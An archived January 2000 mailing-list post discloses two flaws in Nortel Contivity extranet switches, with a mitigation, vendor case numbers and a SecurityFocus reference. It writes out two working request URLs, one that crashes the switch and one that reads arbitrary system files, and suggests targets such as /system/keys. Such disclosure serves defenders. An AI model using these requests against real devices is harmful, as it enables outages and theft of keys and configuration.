Nortel Contivity Extranet Vulnerability!

Chris Carlson carlsonmail at YAHOO.COM
Thu Jan 20 11:35:46 EST 2000


All,

I read this morning a new vulnerability for the
Contivity extranet switches.  This vulnerability gives
anyone the ability to crash the Contivity from a web
browser.

I tested the file list successfully.  Scary!  Typical
cgi-bin exploits, though.

While I don't believe that this vulnerability leads to
an exploit of the authentication, encryption, or IPSec
modules, it's something to consider.

In the mean time, you can disable unencrypted WEB
management sessions to the switch.  That makes the web
server unavailable to anyone NOT coming in encrypted.
To manage it, you would tunnel to the inside interface
of the switch.  (Of course, if you did this, then you
couldn't manage any Contivities remotely if you tunnel
in, since you can't set up two IPSec tunnels on a PC,
one to get into the network and one for the web
server.)

As of yet there is no fix from Nortel, although 2
calls have been logged by Securityfocus.

Nortel has opened cases for each of these
vulnerability's:

 CR# 118890 - DoS

 CR# 118887 - cgiproc 'bug'

A fix is planned for the next release of VxWorks.

There is 2 exploits one that will cause a crash and
one that will allow you to view system files.

http://x.x.x.x/manage/cgi/cgiproc?$

 [crash]

No evidence of this problem being exploited is saved
in the logs.


The second exploit allows any user to view system
files from their web browser.


http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.

(interesting places to look: /system/filelist.dat,
/system/version.dat, /system/keys, /system/core, etc.)

All that is written to the logs when this is exploited
is below:

 09:44:23 tEvtLgMgr 0 : Security [12] Management:
Request for cgiproc denied. requires login

You can read more at
http://www.securityfocus.com/bid/938


Chris
--

__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com

VPN is sponsored by SecurityFocus.COM




More information about the VPN mailing list